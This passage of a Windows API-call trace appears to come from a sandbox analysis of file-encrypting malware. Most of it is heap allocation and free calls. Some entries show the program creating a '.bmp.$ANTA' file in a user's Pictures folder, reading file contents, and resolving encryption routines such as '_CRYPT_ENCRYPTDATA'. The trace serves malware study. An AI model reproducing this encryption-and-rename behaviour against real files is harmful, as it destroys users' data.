dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0094.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0094.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0094.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0094.517] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0094.517] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0094.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0094.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0094.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0094.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0094.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0094.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0094.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0094.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0094.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0094.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0094.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0094.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0094.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0094.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0094.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0094.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0094.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0094.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0094.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0094.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0094.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0094.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0094.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0094.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0094.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0094.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0094.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0094.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4fa8 [0094.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0094.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0094.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0094.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0094.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4fa8 | out: hHeap=0x1780000) returned 1 [0094.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0094.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0094.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0094.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0094.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0094.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0094.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0094.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0094.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0094.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0094.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a2f0 [0094.519] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz")) returned 0x10 [0094.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a2f0 | out: hHeap=0x1780000) returned 1 [0094.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0094.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0094.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0094.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0094.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0094.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0094.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0094.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0094.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0094.520] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\maAjSjcXjKdUlEc2T.bmp.$ANTA" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\maajsjcxjkdulec2t.bmp.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0094.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0094.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0094.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0094.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0094.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0094.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0094.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0094.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0094.520] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0094.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0094.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0094.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0094.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0094.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0094.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0094.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0094.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0094.521] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0094.521] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0094.521] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0094.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0094.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0094.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0094.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0094.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0094.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0094.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0094.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0094.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0094.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0094.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0094.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0094.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0094.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0094.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e05020 [0094.525] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0094.525] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0xf6d5, lpOverlapped=0x0) returned 1 [0094.527] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0094.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0094.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0094.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0094.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0094.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf6d5) returned 0x4516010 [0094.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e05020 | out: hHeap=0x1780000) returned 1 [0094.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0094.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0094.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0094.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0094.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0094.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf6d5) returned 0x45256f0 [0094.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0094.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0094.532] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0094.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0094.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0094.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0094.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0094.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf6d5) returned 0x4516010 [0094.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0094.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0094.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0094.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0094.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0094.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0094.532] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0094.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0094.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0094.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0094.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0094.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0094.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0094.532] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0094.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0094.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0094.532] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0094.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0094.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0094.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0094.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2680 [0094.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0094.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0094.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0094.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0094.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf6d5) returned 0x4516010 [0094.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0094.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26e0 [0094.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0094.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0094.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0094.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2700 [0094.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0094.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0094.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0094.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2610 [0094.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0094.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0094.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0094.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8b0 [0094.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0094.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0094.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0094.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0094.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0094.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf6d5) returned 0x4534dd0 [0094.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0094.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0094.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0094.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0094.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0094.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0094.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0094.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0094.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0094.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0094.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0094.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0094.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0094.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0094.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0094.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0094.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0094.576] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0094.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0094.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0094.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0094.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0094.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0094.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0094.577] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0094.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0094.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0094.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0094.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0094.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0094.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0094.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0094.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0094.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0094.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0094.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0094.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0094.577] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0094.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0094.577] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0094.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0094.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0094.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0094.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0094.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0094.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0094.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0094.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0094.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0094.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0094.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0094.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0094.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0094.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0094.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0094.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 